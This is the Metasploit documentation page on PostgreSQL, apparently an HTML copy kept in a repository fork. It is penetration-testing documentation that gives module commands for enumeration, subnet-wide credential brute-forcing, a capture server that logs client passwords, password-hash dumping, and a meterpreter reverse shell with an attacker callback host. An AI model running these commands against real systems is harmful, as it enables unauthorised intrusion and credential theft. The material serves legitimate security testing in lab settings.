adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
c3f5bd3de2d1affa01e2f6c2066c6bb0fc6413bc
metasploit-gs/docs/pentesting/metasploit-guide-postgresql.html
T

154 lines
60 KiB
HTML
Raw Normal View History

Reboot gh-pages
2026-05-08 17:08:43 +00:00
<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><link rel="shortcut icon" href="/assets/images/favicon.png" type="image/x-icon"><link rel="stylesheet" href="/assets/css/just-the-docs-default.css"> <script async src="https://www.googletagmanager.com/gtag/js?id=UA-4622520-7"></script> <script> window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'UA-4622520-7', { 'anonymize_ip': true }); </script> <script type="text/javascript" src="/assets/js/vendor/lunr.min.js"></script> <script src="https://cdn.jsdelivr.net/npm/mermaid@10.8.0/dist/mermaid.min.js"></script> <script type="text/javascript" src="/assets/js/just-the-docs.js"></script><meta name="viewport" content="width=device-width, initial-scale=1"><title>PostgreSQL | Metasploit Documentation Penetration Testing Software, Pen Testing Security</title><meta name="generator" content="Jekyll v4.3.4" /><meta property="og:title" content="PostgreSQL" /><meta property="og:locale" content="en_US" /><meta name="description" content="View Metasploit Framework Documentation" /><meta property="og:description" content="View Metasploit Framework Documentation" /><link rel="canonical" href="https://rapid7.github.io/metasploit-framework/docs/pentesting/metasploit-guide-postgresql.html" /><meta property="og:url" content="https://rapid7.github.io/metasploit-framework/docs/pentesting/metasploit-guide-postgresql.html" /><meta property="og:site_name" content="Metasploit Documentation Penetration Testing Software, Pen Testing Security" /><meta property="og:type" content="website" /><meta name="twitter:card" content="summary" /><meta property="twitter:title" content="PostgreSQL" /> <script type="application/ld+json"> {"@context":"https://schema.org","@type":"WebPage","description":"View Metasploit Framework Documentation","headline":"PostgreSQL","publisher":{"@type":"Organization","logo":{"@type":"ImageObject","url":"https://rapid7.github.io/metasploit-framework/assets/images/favicon.png"}},"url":"https://rapid7.github.io/metasploit-framework/docs/pentesting/metasploit-guide-postgresql.html"}</script><body> <svg xmlns="http://www.w3.org/2000/svg" style="display: none;"> <symbol id="svg-link" viewBox="0 0 24 24"><title>Link</title><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="feather feather-link"><path d="M10 13a5 5 0 0 0 7.54.54l3-3a5 5 0 0 0-7.07-7.07l-1.72 1.71"></path><path d="M14 11a5 5 0 0 0-7.54-.54l-3 3a5 5 0 0 0 7.07 7.07l1.71-1.71"></path> </svg> </symbol> <symbol id="svg-search" viewBox="0 0 24 24"><title>Search</title><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="feather feather-search"> <circle cx="11" cy="11" r="8"></circle><line x1="21" y1="21" x2="16.65" y2="16.65"></line> </svg> </symbol> <symbol id="svg-menu" viewBox="0 0 24 24"><title>Menu</title><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="feather feather-menu"><line x1="3" y1="12" x2="21" y2="12"></line><line x1="3" y1="6" x2="21" y2="6"></line><line x1="3" y1="18" x2="21" y2="18"></line> </svg> </symbol> <symbol id="svg-arrow-right" viewBox="0 0 24 24"><title>Expand</title><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="feather feather-chevron-right"><polyline points="9 18 15 12 9 6"></polyline> </svg> </symbol> <symbol id="svg-doc" viewBox="0 0 24 24"><title>Document</title><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" s
</code></pre></div></div><p>Or to search for modules that work with a specific session type:</p><div class="language-msf highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="zp">msf</span> <span class="p">&gt;</span> search session_type:postgres
</code></pre></div></div><h3 id="lab-environment"> <a href="#lab-environment" class="anchor-heading" aria-labelledby="lab-environment"><svg viewBox="0 0 16 16" aria-hidden="true"><use xlink:href="#svg-link"></use></svg></a> Lab Environment</h3><p>When testing in a lab environment PostgreSQL can either be installed on the host machine or within Docker:</p><div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>docker run -it --rm --publish 127.0.0.1:5432:5432 -e POSTGRES_PASSWORD=password postgres:13.1-alpine
</code></pre></div></div><h3 id="postgresql-enumeration"> <a href="#postgresql-enumeration" class="anchor-heading" aria-labelledby="postgresql-enumeration"><svg viewBox="0 0 16 16" aria-hidden="true"><use xlink:href="#svg-link"></use></svg></a> PostgreSQL Enumeration</h3><p>Enumerate version:</p><div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>use auxiliary/scanner/postgres/postgres_version
run postgres://192.168.123.13
run postgres://postgres:password@192.168.123.13
</code></pre></div></div><h3 id="postgresql-login--bruteforce"> <a href="#postgresql-login--bruteforce" class="anchor-heading" aria-labelledby="postgresql-login--bruteforce"><svg viewBox="0 0 16 16" aria-hidden="true"><use xlink:href="#svg-link"></use></svg></a> PostgreSQL Login / Bruteforce</h3><p>If you have PostgreSQL credentials to validate:</p><div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>use auxiliary/scanner/postgres/postgres_login
run 'postgres://root: a b c p4$$w0rd@127.0.0.1'
</code></pre></div></div><p>Reusing PostgreSQL credentials in a subnet:</p><div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>use auxiliary/scanner/postgres/postgres_login
run cidr:/24:myspostgresl://user:pass@192.168.222.0 threads=50
</code></pre></div></div><p>Using an alternative port:</p><div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>use auxiliary/scanner/postgres/postgres_login
run postgres://user:pass@192.168.123.6:2222
</code></pre></div></div><p>Brute-force host with known user and password list:</p><div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>use auxiliary/scanner/postgres/postgres_login
run postgres://known_user@192.168.222.1 threads=50 pass_file=./wordlist.txt
</code></pre></div></div><p>Brute-force credentials:</p><div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>use auxiliary/scanner/postgres/postgres_login
run postgres://192.168.222.1 threads=50 user_file=./users.txt pass_file=./wordlist.txt
</code></pre></div></div><p>Brute-force credentials in a subnet:</p><div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>use auxiliary/scanner/postgres/postgres_login
run cidr:/24:postgres://user:pass@192.168.222.0 threads=50
run cidr:/24:postgres://user@192.168.222.0 threads=50 pass_file=./wordlist.txt
</code></pre></div></div><h3 id="obtaining-an-interactive-session"> <a href="#obtaining-an-interactive-session" class="anchor-heading" aria-labelledby="obtaining-an-interactive-session"><svg viewBox="0 0 16 16" aria-hidden="true"><use xlink:href="#svg-link"></use></svg></a> Obtaining an Interactive Session</h3><p>The CreateSession option for <code class="language-plaintext highlighter-rouge">auxiliary/scanner/postgres/postgres_login</code> allows you to obtain an interactive session for the Postgres client youre connecting to. The run command with CreateSession set to true should give you an interactive session.</p><p>For example:</p><div class="language-msf highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="zp">msf</span> auxiliary<span class="p">(</span><span class="kc">scanner/postgres/postgres_login</span><span class="p">)</span> <span class="p">&gt;</span> run rhost=127.0.0.1 rport=5432 username=postgres password=password database=template1 createsession=true
</code></pre></div></div><p>Should yield:</p><div class="language-msf highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="zg">[+]</span> 127.0.0.1:5432 - Login Successful: postgres:password@template1
<span class="zs">[*]</span> PostgreSQL session 1 opened (127.0.0.1:61324 -&gt; 127.0.0.1:5432) at 2024-03-15 14:00:12 -0500
<span class="zs">[*]</span> Scanned 1 of 1 hosts (100% complete)
<span class="zs">[*]</span> Auxiliary module execution completed
</code></pre></div></div><p>You can interact with your session using <code class="language-plaintext highlighter-rouge">sessions -i -1</code> or <code class="language-plaintext highlighter-rouge">sessions &lt;session id&gt;</code>. Use the help command for more info.</p><div class="language-msf highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="zp">msf</span> auxiliary<span class="p">(</span><span class="kc">scanner/postgres/postgres_login</span><span class="p">)</span> <span class="p">&gt;</span> sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 postgresql PostgreSQL postgres @ 127.0.0.1:5432 127.0.0.1:61324 -&gt; 127.0.0.1:5432 (127.0.0.1)
<span class="zp">msf</span> auxiliary<span class="p">(</span><span class="kc">scanner/postgres/postgres_login</span><span class="p">)</span> <span class="p">&gt;</span> sessions -i 1
<span class="zs">[*]</span> Starting interaction with 1...
</code></pre></div></div><p>When interacting with a session, the help command can be useful:</p><div class="language-msf highlighter-rouge"><div class="highlight"><pre class="highlight"><code>postgresql @ 127.0.0.1:5432 (template1) &gt; help
Core Commands
=============
Command Description
------- -----------
? Help menu
background Backgrounds the current session
bg Alias for background
exit Terminate the PostgreSQL session
help Help menu
irb Open an interactive Ruby shell on the current session
pry Open the Pry debugger on the current session
sessions Quickly switch to another session
PostgreSQL Client Commands
==========================
Command Description
------- -----------
query Run a single SQL query
query_interactive Enter an interactive prompt for running multiple SQL queries
Local File System Commands
==========================
Command Description
------- -----------
getlwd Print local working directory (alias for lpwd)
lcat Read the contents of a local file to the screen
lcd Change local working directory
ldir List local files (alias for lls)
lls List local files
lmkdir Create new directory on local machine
lpwd Print local working directory
This session also works with the following modules:
auxiliary/admin/postgres/postgres_readfile
auxiliary/admin/postgres/postgres_sql
auxiliary/scanner/postgres/postgres_hashdump
auxiliary/scanner/postgres/postgres_schemadump
auxiliary/scanner/postgres/postgres_version
exploit/linux/postgres/postgres_payload
exploit/multi/postgres/postgres_copy_from_program_cmd_exec
exploit/multi/postgres/postgres_createlang
exploit/windows/postgres/postgres_payload
</code></pre></div></div><p>Once youve done that, you can run any Postgres query against the target using the <code class="language-plaintext highlighter-rouge">query</code> command:</p><div class="language-msf highlighter-rouge"><div class="highlight"><pre class="highlight"><code>postgresql @ 127.0.0.1:5432 (template1) &gt; query -h
Usage: query
Run a single SQL query on the target.
OPTIONS:
-h, --help Help menu.
-i, --interact Enter an interactive prompt for running multiple SQL queries
Examples:
query SELECT user;
query SELECT version();
query SELECT * FROM pg_catalog.pg_tables;
postgresql @ 127.0.0.1:5432 (template1) &gt; query 'SELECT version();'
<span class="zs">[*]</span> SELECT 1
Response
========
# version
- -------
0 PostgreSQL 14.1 on aarch64-apple-darwin20.6.0, compiled by Apple clang version 12.0.5 (clang-1205.0.22.9), 64-bit
</code></pre></div></div><p>Alternatively you can enter a SQL prompt via the <code class="language-plaintext highlighter-rouge">query_interactive</code> command which supports multiline commands:</p><div class="language-msf highlighter-rouge"><div class="highlight"><pre class="highlight"><code>postgresql @ 127.0.0.1:5432 (template1) &gt; query_interactive -h
Usage: query_interactive
Go into an interactive SQL shell where SQL queries can be executed.
To exit, type 'exit', 'quit', 'end' or 'stop'.
postgresql @ 127.0.0.1:5432 (template1) &gt; query_interactive
<span class="zs">[*]</span> Starting interactive SQL shell for postgresql @ 127.0.0.1:5432 (template1)
<span class="zs">[*]</span> SQL commands ending with ; will be executed on the remote server. Use the exit command to exit.
SQL &gt;&gt; SELECT table_name
SQL *&gt; FROM information_schema.tables
SQL *&gt; LIMIT 2;
<span class="zs">[*]</span> Executing query: SELECT table_name FROM information_schema.tables LIMIT 2;
<span class="zs">[*]</span> SELECT 2
Response
========
# table_name
- ----------
0 pg_statistic
1 pg_type
SQL &gt;&gt;
</code></pre></div></div><h3 id="postgresql-capture-server"> <a href="#postgresql-capture-server" class="anchor-heading" aria-labelledby="postgresql-capture-server"><svg viewBox="0 0 16 16" aria-hidden="true"><use xlink:href="#svg-link"></use></svg></a> PostgreSQL Capture Server</h3><p>Captures and log PostgreSQL credentials:</p><div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>use auxiliary/server/capture/postgresql
run
</code></pre></div></div><p>For example, if a client connects with:</p><div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>psql postgres://postgres:mysecretpassword@localhost:5432
</code></pre></div></div><p>Metasploits output will be:</p><div class="language-msf highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="zp">msf</span> auxiliary<span class="p">(</span><span class="kc">server/capture/postgresql</span><span class="p">)</span> <span class="p">&gt;</span>
<span class="zs">[*]</span> Started service listener on 0.0.0.0:5432
<span class="zs">[*]</span> Server started.
<span class="zg">[+]</span> PostgreSQL LOGIN 127.0.0.1:60406 postgres / mysecretpassword / postgres
</code></pre></div></div><h3 id="postgresql-dumping"> <a href="#postgresql-dumping" class="anchor-heading" aria-labelledby="postgresql-dumping"><svg viewBox="0 0 16 16" aria-hidden="true"><use xlink:href="#svg-link"></use></svg></a> PostgreSQL Dumping</h3><p>User and hash dump:</p><div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>use auxiliary/scanner/postgres/postgres_hashdump
run postgres://postgres:password@192.168.123.13
run postgres://postgres:password@192.168.123.13/database_name
</code></pre></div></div><p>Schema dump:</p><div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>use auxiliary/scanner/postgres/postgres_schemadump
run postgres://postgres:password@192.168.123.13
run postgres://postgres:password@192.168.123.13 ignored_databases=template1,template0,postgres
</code></pre></div></div><h3 id="postgresql-querying"> <a href="#postgresql-querying" class="anchor-heading" aria-labelledby="postgresql-querying"><svg viewBox="0 0 16 16" aria-hidden="true"><use xlink:href="#svg-link"></use></svg></a> PostgreSQL Querying</h3><div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>use auxiliary/admin/postgres/postgres_sql
run 'postgres://user:this is my password@192.168.1.123/database_name' sql='select version()'
</code></pre></div></div><h3 id="postgresql-reverse-shell"> <a href="#postgresql-reverse-shell" class="anchor-heading" aria-labelledby="postgresql-reverse-shell"><svg viewBox="0 0 16 16" aria-hidden="true"><use xlink:href="#svg-link"></use></svg></a> PostgreSQL Reverse Shell</h3><div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>use exploit/linux/postgres/postgres_payload
run postgres://postgres:password@192.168.123.6 lhost=192.168.123.1 lport=5000 payload=linux/x64/meterpreter/reverse_tcp target='Linux\ x86_64'
</code></pre></div></div><hr><footer><p><a href="#top" id="back-to-top">Back to top</a></p><p class="text-small text-grey-dk-000 mb-0"> <a href="https://github.com/rapid7/metasploit-framework/tree/master/docs/metasploit-framework.wiki/Metasploit-Guide-PostgreSQL.md" id="edit-this-page">Edit this page on GitHub</a></p></footer></div></div><div class="search-overlay"></div></div><script type="text/javascript" src="/assets/js/toggle_mode.js"></script> <script> var config = { theme: 'default', logLevel: 'fatal', securityLevel: 'strict', startOnLoad: true, arrowMarkerAbsolute: false, er: { diagramPadding: 20, layoutDirection: 'TB', minEntityWidth: 100, minEntityHeight: 75, entityPadding: 15, stroke: 'gray', fill: 'honeydew', fontSize: 12, useMaxWidth: true, }, flowchart:{ diagramPadding: 8, htmlLabels: true, curve: 'basis', }, sequence: { diagramMarginX: 50, diagramMarginY: 10, actorMargin: 50, width: 150, height: 65, boxMargin: 10, boxTextMargin: 5, noteMargin: 10, messageMargin: 35, messageAlign: 'center', mirrorActors: true, bottomMarginAdj: 1, useMaxWidth: true, rightAngles: false, showSequenceNumbers: false, }, gantt: { titleTopMargin: 25, barHeight: 20, barGap: 4, topPadding: 50, leftPadding: 75, fontSize: 11, gridLineStartPadding: 35, fontFamily: '\'Open Sans\', sans-serif', numberSectionStyles: 4, axisFormat: '%Y-%m-%d', topAxis: false, }, }; mermaid.initialize(config); window.mermaid.init(undefined, document.querySelectorAll('.language-mermaid')); </script>
Reference in New Issue Copy Permalink